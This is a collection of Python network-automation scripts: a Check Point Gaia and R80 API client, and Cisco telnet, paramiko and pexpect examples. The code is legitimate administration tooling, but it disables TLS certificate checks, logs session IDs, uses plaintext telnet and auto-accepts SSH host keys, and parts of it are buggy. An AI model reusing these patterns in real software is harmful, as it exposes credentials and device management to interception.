self.headers = {}
self.url=url
self.payload_list = payload # default only username and passowrd
done=False
counter=0
# loop to handle connection interuption
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging ('Connector() - init() - connection to API can not be established even in loop, check your credentials or IP connectivity')
sys.exit(1)
try:
self.response = requests.post(self.url+"login", json=self.payload_list, headers=self.headers_default, verify=False)
DoLogging().do_logging('Connector() - init() - login OK: {}'.format(self.url))
DoLogging().do_logging('Connector() - init() - login data: {}'.format(self.response.text))
if self.response.status_code == 200:
#print(json.loads(self.response.text))
try:
sid_out=json.loads(self.response.text)
self.sid = sid_out['sid']
self.headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': self.sid,
}
DoLogging().do_logging('Connector() - init() - Connection to API is okay')
except Exception as e:
DoLogging().do_logging(' Connector() - init() - API is not running probably: {}..'.format(e))
else:
a = json.loads(self.response.text)
DoLogging().do_logging("Connector() - init() - Exception occured: {}".format(a))
DoLogging().do_logging('Connector() - init() - There is no SID, connection problem to API gateway, trying again..')
time.sleep (1)
continue
except Exception as e:
DoLogging().do_logging(' Connector() - init() - exception occured..can not connect to mgmt server, check IP connectivity or ssl certificates!!! : {}'.format(e))
else:
done=True
def logout(self) -> None:
"""
Logout method for correct disconenction from API
"""
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging('Connector() - logout() - logout can not be done because connection to mgmt is lost and reconnect does not work...')
sys.exit(1)
else:
try:
payload_list={}
self.response = requests.post(self.url+"logout", json=payload_list, headers=self.headers, verify=False)
if self.response.status_code == 200:
DoLogging().do_logging ('Connector() - logout() - logout from API is okay')
return self.response.json()
else:
out = json.loads(self.response.text)
DoLogging().do_logging (" ")
DoLogging().do_logging(out)
DoLogging().do_logging (" ")
return self.response.json()
except Exception as e:
DoLogging().do_logging ('Connector() - logout() - connection to gateway is broken, trying again: {}'.format(e))
@staticmethod
def base64_ascii(base64resp:str) -> str:
"""Converts base64 to ascii for run command/showtask."""
try:
return base64.b64decode(base64resp).decode('utf-8')
except Exception as e:
DoLogging().do_logging("base64 error:{}".format(e))
def run_script(self, payload:dict) -> str:
"""
run script method is responsible for running script on target (ls -la, df -lh etc. basic linux commands)
"""
payload_list=payload
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': self.sid,
}
return_string = ''
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging('Connector() - run_script() - discard can not be done because connection to mgmt is lost and reconnect does not work...')
sys.exit(1)
else:
try:
self.response = requests.post(self.url+"run-script", json=payload_list, headers=headers, verify=False)
task=json.loads(self.response.text)
while True:
show_task=Connector.task_method(self.sid,self.url,task['task-id'])
show_task_text=json.loads(show_task.text)
#DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text))
time.sleep (5)
if show_task_text['tasks'][0]['progress-percentage'] == 100:
base64resp = (str(self.send_cmd('show-task', payload={"task-id":show_task_text['tasks'][0]['task-id']})['tasks'][0]['task-details'][0]['output']))
asciiresp = self.base64_ascii(base64resp)
return_string=return_string+"\n\n"+"Data for target:"+"\n"+asciiresp+"\n\n\n\n\n\n"
#DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text))
break
else:
continue
return return_string
except Exception as e:
DoLogging().do_logging ("Connector() - run_script() - Exception in run_script method, some data not returned, continue: {} {}".format(e, tasks))
else:
done=True
def send_cmd(self, cmd:str, payload:dict) -> dict:
"""
Core method, all data are exchanged via this method via cmd variable, you can show, add data etc.
"""
done=False
counter=0
while not done:
counter +=1
if counter == 5:
DoLogging().do_logging ("Connector() - send_cmd() - Can not send API cmd in loop, there are some problems, changes are unpublished, check it manually..")
self.logout()
sys.exit(1)
else:
try:
payload_list=payload
self.response = requests.post(self.url + cmd, json=payload_list, headers=self.headers, verify=False)
if self.response.status_code == 200:
#uncomment for TSHOOT purposes
DoLogging().do_logging ('Connector() - send_cmd() - send cmd is okay')
#out = json.loads(self.response.text)
#DoLogging().do_logging ('Connector() - send_cmd() - send cmd response is 200 :{}'.format(out))
return self.response.json()
else:
out = json.loads(self.response.text)
DoLogging().do_logging(" Connector() - send_cmd() - response code is not 200 :{}".format(out))
return self.response.json()
except Exception as e:
DoLogging().do_logging ("Connector() - send_cmd() - POST operation to API is broken due connectivity flap or issue.. trying again..: {}".format(e))
######## Class############
class Interactive_Init_Handler():
"""
Init class for getting basic data about user/pwd/GW IP and establishing connector for API
"""
def __init__(self) -> None:
self.user=''
self.password=''
self.IP=''
self.node1IP=''
self.node2IP=''
self.connector=None
self.connectors=[]
self.version=''
self.data = None
self.path=''
@staticmethod
def validate_ip(ip:str) -> bool:
"""
validate ip format to avoid adding crazy data for IP based variable
"""
check = True
try:
data = ip.split(":")
ip = ipaddress.ip_address(data[0])
return check
except Exception as e:
check= False
print ("IP validation failed for some reason!: {}".format(e))
return check
def _single(self, singleIP=None)-> None:
"""
establishing single connector to appropriate gateways via special class Connector() object
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if singleIP == None:
self.IP=input("Enter GW IP: ")
else:
self.IP = singleIP
if not self.user or not self.password or not self.IP:
print ("Empty username or password or server IP, finish..")
sys.exit(1)
else:
if self.validate_ip(self.IP):
payload ={
"user":self.user,
"password":<PASSWORD>
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.IP), payload)
self.connector = connector
except Exception as e:
print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e))
else:
print ("Wrong IP for single GW, exit")
raise Exception ("Wrong IP for single GW, exit")
except Exception as e:
raise Exception ("Error in Interactive_Init_Handler()._single() method")
print ("Connector to single gw is established")
def _cluster (self, nodeIP1=None, nodeIP2=None) -> None:
"""
establishing cluster connectors to appropriate gateways via special class Connector() object
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if nodeIP1 == None and nodeIP2 == None:
self.node1IP=input("Enter node1 IP: ")
self.node2IP=input("Enter node2 IP: ")
else:
self.node1IP = nodeIP1
self.node2IP = nodeIP2
if not self.user or not self.password or not self.node1IP or not self.node2IP:
print ("Empty username or password or server IP, finish..")
sys.exit(1)
else:
if self.validate_ip(self.node1IP):
payload ={
"user":self.user,
"password":<PASSWORD>
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.node1IP), payload)
self.connectors.append(connector)
except Exception as e:
print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e))
if self.validate_ip(self.node2IP):
payload ={
"user":self.user,
"password":self.password
}
try:
connector = Connector('https://{}/gaia_api/'.format(self.node2IP), payload)
self.connectors.append(connector)
except Exception as e:
print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e))
else:
print ("Wrong IP for single GW, exit")
raise Exception ("Wrong IP for single GW, exit")
except Exception as e:
raise Exception ("Error in Interactive_Init_Handler()._cluster() method")
print ("Connectors to cluster established")
def _load_data(self, path=None)-> dict:
"""
load json data via separate object via class Load_Data()
depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not
"""
try:
if path == None:
# interactive mode
path=input("Where is your json file with data for vlan manipulation?\n If no path specified, I count file data.json is in same folder as script\n")
if not path:
data = Load_Data()
return data.load_data()
else:
data = Load_Data(path)
return data.load_data()
else:
# mode with args
data = Load_Data(path)
return data.load_data()
except Exception as e:
raise Exception
def run(self) -> None:
"""
handle user input at the beginning // handle argparse parameters - depends on the format
"""
try:
argParser = argparse.ArgumentParser(description='_Script for Gaia API modification_')
argParser.add_argument("-s", dest="single", help=('specify single GW IP'), required=False)
argParser.add_argument("-jh", dest="jh", help=('display json format help'), required=False)
argParser.add_argument("-n1", dest="node1", help=('spiecify cluster node1 IP'), required=False)
argParser.add_argument("-n2", dest="node2", help=('spiecify cluster node2 IP'), required=False)
argParser.add_argument("-u", dest="user", help=('spiecify user name'), required=False)
#argParser.add_argument("-p", dest="password", help=('spiecify password'), required=False)
argParser.add_argument("-v", dest="version", help=('spiecify version to run [cluster/single]'), required=False)
argParser.add_argument("-d", dest="path", help=('spiecify path to json data, default is the same directory'), required=False)
args = argParser.parse_args()
if args.jh == "TRUE":
print (Error_Msg().display())
sys.exit(1)
# check if args are filled up, if not do interactive mode
if args.user == None and args.version == None and args.path == None:
print("###############################",
"Check Point GAiA API connector, interactive mode for Gaia OS modification via API",
"",
"XXXXXXXXXX Training version for ihr XXXXXXXXXXXX",
"There is a log file: logcp_gaia_api.elg in the same folder as this script, check it if something goes wrong ",
"",
"This script takes json data [keys node1,node2,single in XXX.json are mandatory!] -> respect general GAiA API calls -> for other keys and payloads for that call consult gaia API reference",
"",
"!!!!! IF you do not want to use interactive mode, just hit ctrl+c and run python gaia_api_connector.py -h !!!!",
"",
"If you want to see supported json format, run gaia_api_connector.py -jh TRUE ",
"",
"###############################",
sep="\n")
self.user=input("Enter API/GUI user name with write permissions: ")
self.password=getpass.getpass()
self.version=input("Is this single GW or Cluster?\n Type: [single] for single GW or [cluster] for cluster GW:")
if self.version == "single":
try:
self.version='single'
self._single()
self.data = self._load_data()
print ("")
print ("#########################################")
print ("Running on single node: {}".format(self.IP))
try:
Operate_CP(self.data['single'],self.connector).run()
except Exception as e:
raise Exception("json data issue, single, interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling single gw from interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress in progress")
elif self.version == "cluster":
try:
self.version='cluster'
self._cluster()
self.data = self._load_data()
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node1IP))
try:
Operate_CP(self.data['node1'],self.connectors[0]).run()
except Exception as e:
raise Exception("json data issue, cluster, interactive..")
print ("#########################################")
print ("")
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node2IP))
try:
Operate_CP(self.data['node2'], self.connectors[1]).run()
except Exception as e:
raise Exception("json data issue, cluster, interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling cluster from interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
else:
print ("")
print ("")
print ("You were asked for something, your input was wrong, now you have to start again :P\n Press ctrl+c for exit")
print ("")
print ("")
self.run()
# non interactive mode here
else:
if args.user == None or args.version == None or args.path == None :
print ("migging arguments, run -h option")
else:
self.user = args.user
self.password = <PASSWORD>()
self.version = args.version
self.path = args.path
if self.version == "single":
if args.single == None:
print ("migging or wrong arguments, run -h option")
else:
try:
self.IP = args.single
self._single(self.IP)
self.data = self._load_data(self.path)
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.IP))
try:
Operate_CP(self.data['single'],self.connector).run()
except Exception as e:
raise Exception ("json data issue, single, non-interactive..")
print ("#########################################")
print ("")
except Exception as e:
print ("issue when calling single gw from non-interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
else:
if args.node1 == None and args.node2 == None:
print ("migging or wrong arguments, run -h option")
else:
try:
self.node1IP = args.node1
self.node2IP = args.node2
self._cluster(self.node1IP, self.node2IP)
self.data = self._load_data(self.path)
try:
print ("")
print ("#########################################")
print ("Running on node: {}".format(self.node1IP))
Operate_CP(self.data['node1'],self.connectors[0]).run()
print ("#########################################")
print ("")
print ("")
print ("##########################################")
print ("Running on node: {}".format(self.node2IP))
Operate_CP(self.data['node2'], self.connectors[1]).run()
print ("#########################################")
print ("")
except Exception as e:
raise Exception ("json data issue, cluster, non-interactive..")
except Exception as e:
print ("issue when calling cluster from non-interactive mode in run() method : {}".format(e))
raise Exception ("Clean up in progress")
except KeyboardInterrupt:
print ("\n ctrl+c pressed, exit..")
# if there is no connector just leave
try:
self.connector.logout()
sys.exit(1)
except:
try:
for item in self.connectors:
item.logout()
sys.exit(1)
except:
sys.exit(1)
except Exception as e:
print ("\n Interactive_Init_Handler().run() error: {}".format(e))
# if there is no connector just leave
try:
self.connector.logout()
sys.exit(1)
except:
try:
for item in self.connectors:
item.logout()
sys.exit(1)
except:
sys.exit(1)
######## Class############
class Operate_CP():
"""
data are extracted here and send against Gaia API
"""
def __init__(self, data:list, connector:object) -> None:
self.data = data
self.connector = connector
def run(self):
try:
check_msg02_sent = False # check if special error msg has been displayed
for cmd in self.data: # every item in self.data is like a call with payload
keys = list(cmd.keys()) # I need keys since I do not know what is there - key is api call
i=0 # aka first key in keys list
for item in keys:
try:
if i > 0: # if there is more keys in dict, finsh, this is unsupported format for this script
raise Exception ("Unsupported json format for this script")
except Exception as e:
print ("Operate_CP().run() issue: {}!! \n {}".format(e, Error_Msg().display2()))
check_msg02_sent = True # msg has been send, set check
raise Exception ("Unsupported json format for this script")
else:
print ("#####################################")
print ("running API call:{}".format(keys[i]))
if keys[i] =="run-script":
#run script has special method because output is encoded in base64 format
for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API
print ("")
print ("payload:\n {}".format(item))
print ("result: {}".format(self.connector.run_script(item)))
print ("")
else:
for item in cmd[keys[i]]:# for every item in apicall -> {"apicall": [{payload}, payload]} -> run the payload against API
print ("")
print ("payload:\n {}".format(item))
print ("result: {}".format(json.dumps(self.connector.send_cmd(keys[i],item), indent=4, sort_keys=True)))
print ("")
print ("#######################################")
i+=1
except Exception as e:
if check_msg02_sent == False:
print ("Operate_CP().run() issue: Follow right json data format for this script!! \n {}".format(Error_Msg().display()))
raise Exception ("Unsupported json format for this script")
######## Class############
class Error_Msg():
def __init__(self) -> None:
pass
def display2(self):
return ("""Make sure you have right format:\n
You defined just one item in node1 list and rest as part of dict -->\n
[{"cmd1":[{payload_data01}, {payload-data02}], "cmd2":[{payload_data01}, {payload-data02}]}]
this format is not supported... \n
be really careful, you can owerwrite your data (eth1.11 overwritten by eth1.20) if you do something like this since in python dict :\n
"node1": [
{"delete-vlan-interface":[
{"name":"eth1.11"},
{"name":"eth1.12"},
{"name":"eth1.13"},
{"name":"eth1.14"}],
"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}],
"delete-vlan-interface":[
{"name":"eth1.20"},
{"name":"eth1.12"},
{"name":"eth1.13"},
{"name":"eth1.14"}]
}
],
"node2":[
{XXX}
]
"single":[
{XXX}
]
}
""")
def display(self):
return (""" Make sure you have right format:\n
Keys node1, node2, single are mandatory!\n
define as dedicated item in node1[] list -->\n
[{"apiCall":[{payload_data01}, {payload-data02}]},{"apiCall":[{payload_data01}, {payload-data02}]}]
prefered format!!!
{
"node1": [
{"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}]},
{"add-vlan-interface":[
{"parent":"eth1","id":11, "ipv4-address":"10.10.20.2", "ipv4-mask-length":24},
{"parent":"eth1","id":12, "ipv4-address":"10.10.30.2", "ipv4-mask-length":24},
{"parent":"eth1","id":13, "ipv4-address":"10.10.40.2", "ipv4-mask-length":24},
{"parent":"eth1","id":14, "ipv4-address":"10.10.50.2", "ipv4-mask-length":24}]}
],
"node2": [
{XXX},
{XXX}
],
"single":[
{XXX},
{XXX}
]
}
if you are using cluster, define node1 and node2, but leave single in json file as follow:
"single":[]
same for case you are running via single, just leave node1, node2 lists empty but keep the keys!!!
""")
######## Class############
class Load_Data():
def __init__(self, path='data.json') -> None:
self.path = path
def _validate_data(self, data) -> bool:
try:
if 'node1' in data and 'node2' in data and 'single' in data:
return True
except Exception as e:
print ("There is wrong data format: {} gateway".format(e))
return False
def load_data(self) -> dict:
try:
with open(self.path) as f:
data = json.load(f)
if self._validate_data(data):
if data == None:
raise Exception(Error_Msg().display())
else:
return data
else:
raise Exception(Error_Msg().display())
except Exception as e:
print ("Can not load data, make sure path to data.json is right or json is in same folder as script, make sure your format is right: {}".format(e))
print(Error_Msg().display())
######## Class############
def handler(signum, frame):
"""
just handling if someone press ctrl+z
"""
print ("Ctrl+Z pressed, but ignored")
def main():
"""
main method where all starts
enjoy! ihr..
"""
try:
current_path=(os.path.dirname(os.path.abspath(__file__)))
log='{0}/gaia_api_connector.elg'.format(current_path)
os.remove(log)
except Exception as e:
pass
signal.signal(signal.SIGTSTP, handler)
run = Interactive_Init_Handler()
run.run()
if __name__ == "__main__":
main()
``` |
{
"source": "0dadj1an/mix",
"score": 3
} |
#### File: KirkB-Automation/namespaces/namespaces.py
```python
x=10
y=20
z=30
def namespace01():
def namespace02():
x=0.5
print x
print y
print z
x=1
y=2
print x
print y
print z
namespace02()
namespace01()
print x
print y
print z
```
#### File: KirkB-Automation/paramiko_netmiko/ConnectDevice02.py
```python
import telnetlib
import time
import socket
import sys
TIMEOUT = 6
TELNET_PORT = 23
class ConnectDevice02(object):
def __init__(self, ip, username, password):
self.ip = ip
self.username = username
self.password = password
try:
self.connection = telnetlib.Telnet(self.ip, TELNET_PORT, TIMEOUT)
except socket.timeout:
sys.exit("Unable to connect due timeout")
self.telnetLogin()
def telnetSend(self, command):
command = command.rstrip()
self.connection.write(command + '\n')
time.sleep(1)
return self.connection.read_very_eager()
def telnetLogin(self):
output = self.connection.read_until("sername:", TIMEOUT)
self.connection.write(self.username +'\n')
output = output + self.connection.read_until("ssword:", TIMEOUT)
self.connection.write(self.password +'\n')
return output
def telnetClose():
self.connection.close()
def main():
ip_add = raw_input("write IP" + '\n')
username = raw_input("write username" + '\n')
password = raw_input("write password" + '\n')
new_connection = ConnectDevice02(ip_add, username, password)
new_connection.telnetSend('terminal length 0')
new_connection.telnetSend('show version')
new_connection.telnetClose()
```
#### File: python_bundle_1_2/mgmt_api_lib/api_exceptions.py
```python
class APIException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
class APIClientException(APIException):
pass
``` |
{
"source": "0dadj1an/pynet",
"score": 3
} |
#### File: pynet/ciscoconfparse/confparse.py
```python
import re
from ciscoconfparse import CiscoConfParse
parse = CiscoConfParse("/home/hrb/github/pynet/ciscoconfparse/config.txt")
objects = parse.find_objects("^crypto map CRYPTO")
objects2 = parse.find_objects_wo_child(parentspec=r"crypto map CRYPTO", childspec=r"AES")
def findParentAndChildern():
for obj in objects:
print "Parent is:"
print obj.text
print""
parent = objects[objects.index(obj)]
list_a= parent.children
print "Childerns are:"
for child in list_a:
print child.text
print""
def findPFSgroup2():
print "#################"
print "CRYPTO maps with PFSgroup2 are:\n"
for obj in objects:
if obj.re_search_children(r"set pfs group2"):
print obj.text
print""
def findNOTAES():
print "#################"
print "CRYPTO maps with NO AES:\n"
for obj in objects2:
for child in obj.children:
if 'transform' in child.text:
pattern = re.search(r"set transform-set (.*)$", child.text)
transform_set = pattern.group(1)
print "{0} and transform set is: {1}".format(obj.text, transform_set)
def main():
findParentAndChildern()
findPFSgroup2()
findNOTAES()
if __name__ == '__main__':
main()
```
#### File: pynet/paramiko_netmiko/class4ex_paramiko.py
```python
import time
import paramiko
from getpass import getpass
def disablePaging(connection):
'''disable paging by entering terminal lenght'''
connection.send("terminal length 0\n")
time.sleep(1)
output = connection.recv(1000)
return output
def showVersion(connection):
''' method for showing the version '''
connection.send("show version\n")
time.sleep(1)
output = connection.recv(5000)
return output
def enterConfig(connection):
'''congig mode method '''
connection.send("conf t\n")
time.sleep(1)
output = connection.recv(5000)
return output
def loginBuffered(connection):
''' changing login buffer '''
connection.send("loggin buffered 65000\n")
time.sleep(1)
output = connection.recv(5000)
return output
def showRun(connection):
''' show run '''
connection.send("show run\n")
time.sleep(1)
output = connection.recv(5000)
return output
def exitFromConf(connection):
''' exit from conf t mode '''
connection.send("exit\n")
time.sleep(1)
output = connection.recv(5000)
return output
def main():
ip = '172.16.17.32'
username = 'pyclass'
password = get<PASSWORD>()
remote_conn=paramiko.SSHClient()
# avoid issues with not trusted targets
remote_conn.set_missing_host_key_policy(paramiko.AutoAddPolicy())
remote_conn.connect(ip, username=username, password=password, look_for_keys=False, allow_agent=False)
#invoke shell means you can send commands more times
remote_conn02 = remote_conn.invoke_shell()
disablePaging(remote_conn02)
enterConfig(remote_conn02)
loginBuffered(remote_conn02)
exitFromConf(remote_conn02)
output = showRun(remote_conn02)
print output
if __name__ == "__main__":
main()
```
#### File: pynet/paramiko_netmiko/pexpect_test.py
```python
import pexpect
import sys
import time
def main():
ip = '192.168.3.11'
username = 'pyclass'
password = ''
port = 8022
remote_conn = pexpect.spawn('ssh -l {} {} -p {}'.format(username, password, port))
remote_conn02 = pexpect.spawn()
remote_conn.timeout = 3
remote_conn.expect('ssword:')
remote_conn.sendline(password)
remote_conn.expect('#')
remote_conn.sendline('show ip int brief')
remote_conn.expect('#')
remote_conn.sendline('conf t')
remote_conn.expect('#')
remote_conn.sendline('loggin buffered 65000')
remote_conn.expect('#')
remote_conn.sendline('exit')
remote_conn.expect('#')
remote_conn.sendline('show run')
remote_conn.expect('#')
print remote_conn.before
if __name__ == "__main__":
main()
```
#### File: pynet/telnetlib/exercise_2_and_3.py
```python
import telnetlib
import time
import socket
import sys
class ConnectDevice02(object):
def __init__(self, ip, username, password):
self.ip = ip
self.username = username
self.password = password
self.timeout = 6
self.port =23
try:
self.connection = telnetlib.Telnet(self.ip, self.port, self.timeout)
except socket.timeout:
sys.exit("Unable to connect due timeout")
self.telnetLogin()
self.telnetSend("terminal length 0")
def telnetSend(self, command):
command = command.rstrip()
self.connection.write(command + '\n')
time.sleep(1)
return self.connection.read_very_eager()
def telnetLogin(self):
output = self.connection.read_until("sername:", self.timeout)
if output:
self.connection.write(self.username +'\n')
else:
print "Not possible to add username"
output = output + self.connection.read_until("ssword:", self.timeout)
if output:
self.connection.write(self.password +'\n')
else:
print "Not possible to add username"
#print output
def telnetClose(self):
self.connection.close()
def main():
ip_add = raw_input("write IP" + '\n')
username = raw_input("write username" + '\n')
password = raw_input("write password" + '\n')
command = raw_input("enter command to be executed" + '\n')
new_connection = ConnectDevice02(ip_add, username, password)
output = new_connection.telnetSend("terminal length 0")
output = new_connection.telnetSend(command)
print output
new_connection.telnetClose()
if __name__ == "__main__":
main()
``` |
{
"source": "0dadj1an/r80python",
"score": 3
} |
#### File: 0dadj1an/r80python/r80_apis.py
```python
import requests
import json
import pprint
#remove https warning
requests.packages.urllib3.disable_warnings()
#url = "https://192.168.248.150/web_api/"
#user = "api_user"
#pw = "<PASSWORD>"
def login(url,user,pw):
payload_list={}
payload_list['user']=user
payload_list['password']=pw
headers = {
'content-type': "application/json",
'Accept': "*/*",
}
response = requests.post(url+"login", json=payload_list, headers=headers, verify=False)
return response
def add_host(sid,url,name,ip_address,groups="",comments="",nat_settings=""):
payload_list={}
payload_list['name']=name
payload_list['ipv4-address']= ip_address
if nat_settings != "":
payload_list['nat-settings']= nat_settings
if groups != "" :
payload_list['groups']= groups
if comments != "":
payload_list['comments']= comments
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
print payload_list
response = requests.post(url+"add-host", json=payload_list, headers=headers, verify=False)
return response.json()
def delete_host(sid,url,name):
payload_list={}
payload_list['name']=name
payload_list['ignore-warnings']="true"
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-host", json=payload_list, headers=headers, verify=False)
return response
def add_network(sid,url,name,subnet,mask_length,nat_settings,groups):
payload_list={}
payload_list['name']=name
payload_list['subnet4']= subnet
payload_list['mask-length']= mask_length
payload_list['nat-settings']= nat_settings
payload_list['groups']= groups
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-network", json=payload_list, headers=headers, verify=False)
return response.json()
def delete_network(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-network", json=payload_list, headers=headers, verify=False)
return response
def show_network_groups(sid,url):
payload_list={}
payload_list['details-level']="standard"
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-groups", json=payload_list, headers=headers, verify=False)
groups=json.loads(response.text)
return groups
def add_network_group(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-group", json=payload_list, headers=headers, verify=False)
return response
def add_members_to_network_group(sid,url,members):
payload_list={}
payload_list['name']=name
payload_list['members']=members
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"set-group", json=payload_list, headers=headers, verify=False)
return response
def add_access_layer(sid,url,name):
payload_list={}
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-layer", json=payload_list, headers=headers, verify=False)
return response
def add_policy_package(sid,url,name,access_layer,threat_layer,comments):
payload_list={}
payload_list['name']=name
payload_list['access']=access_layer
payload_list['threat-prevention']=threat_layer
payload_list['comments']=comments
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-package", json=payload_list, headers=headers, verify=False)
return response
def add_access_section(sid,url,layer,position,name):
payload_list={}
payload_list['layer']=layer
payload_list['position']=position
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-section", json=payload_list, headers=headers, verify=False)
return response
def delete_access_section_by_name(sid,url,layer,name):
payload_list={}
payload_list['name']=name
payload_list['layer']=layer
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-section", json=payload_list, headers=headers, verify=False)
return response
def show_access_section(sid,url,layer,name):
payload_list={}
payload_list['layer']=layer
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-access-section", json=payload_list, headers=headers, verify=False)
return response
def add_access_rule(sid,url,layer,position,rule):
payload_list={}
payload_list['layer']=layer
payload_list['position']=position
payload_list['name']=rule['name']
payload_list['source']=rule['source']
payload_list['destination']=rule['destination']
payload_list['service']=rule['service']
payload_list['track']=rule['track']
payload_list['action']=rule['action']
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"add-access-rule", json=payload_list, headers=headers, verify=False)
return response
def delete_access_rule_by_rule_number(sid,url,layer,number):
payload_list={}
payload_list['layer']=layer
payload_list['rule-number']=number
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-rule", json=payload_list, headers=headers, verify=False)
return response
def delete_access_rule_by_rule_name(sid,url,layer,name):
payload_list={}
payload_list['layer']=layer
payload_list['name']=name
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"delete-access-rule", json=payload_list, headers=headers, verify=False)
return response
def publish(sid,url):
payload_list={}
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"publish", json=payload_list, headers=headers, verify=False)
return response
def add_range():
payload_list={}
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"publish", json=payload_list, headers=headers, verify=False)
return response
def show_task(sid,url,task):
payload_list={}
payload_list['task-id']=task
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"show-task", json=payload_list, headers=headers, verify=False)
return response
def logout(sid,url):
payload_list={}
headers = {
'content-type': "application/json",
'Accept': "*/*",
'x-chkp-sid': sid,
}
response = requests.post(url+"logout", json=payload_list, headers=headers, verify=False)
return response
#main program
#login and get the session id
#sid=login(url,user,pw)
#get all groups
#add policy package
#name="my_cpx_policy2"
#comments="created by automation script"
#access_layer="true"
#threat_layer="true"
#package_return=add_policy_package(sid,url,name,access_layer,threat_layer,comments)
#print package_return
#add access rule section
#layer="my_cpx_policy2 network"
#position="top"
#position={"above":"Cleanup rule"}
#name="section1 - created by automation2"
#show_section_return=show_access_section(sid,url,layer,name)
#show_section_return=show_access_section(sid,url,layer,name)
#if show_section_return.status_code == "200":
# print "section already exists skipping"
#else:
# add_access_section(sid,url,layer,position,name)
#add access rule
#layer="my_cpx_policy2 network"
#position="top"
#rule={}
#rule['source']="any"
#rule['destination']="any"
#rule['service']="http"
#rule['action']="accept"
#rule['track']="Network Log"
#rule['name']="my rule 1"
#rule_response=add_access_rule(sid,url,layer,position,rule)
#print json.loads(rule_response.text)
#print rule_response
#add access rule to section
#layer="my_cpx_policy2 network"
#position={"top":"section1 - created by automation"}
#rule={}
#rule['source']="any"
#rule['destination']="any"
#rule['service']=["https","http"]
#rule['action']="accept"
#rule['track']="Network Log"
#rule['name']="my rule 2"
#rule_response=add_access_rule(sid,url,layer,position,rule)
#print rule_response
#print json.loads(rule_response.text)
#publish
#publish(sid,url)
``` |
{
"source": "0dj0bz/hn-vis",
"score": 3
} |
#### File: hn-vis/openGL/test.py
```python
import OpenGL.GL as GL
import OpenGL.GL.shaders
import ctypes
import pygame
import numpy
vertex_shader = """
#version 330
in vec4 position;
void main()
{
gl_Position = position;
}
"""
fragment_shader = """
#version 330
void main()
{
gl_FragColor = vec4(1.0f, 1.0f, 1.0f, 1.0f);
}
"""
vertices = [ 0.6, 0.6, 0.0, 1.0,
-0.6, 0.6, 0.0, 1.0,
0.0, -0.6, 0.0, 1.0]
vertices = numpy.array(vertices, dtype=numpy.float32)
def create_object(shader):
# Create a new VAO (Vertex Array Object) and bind it
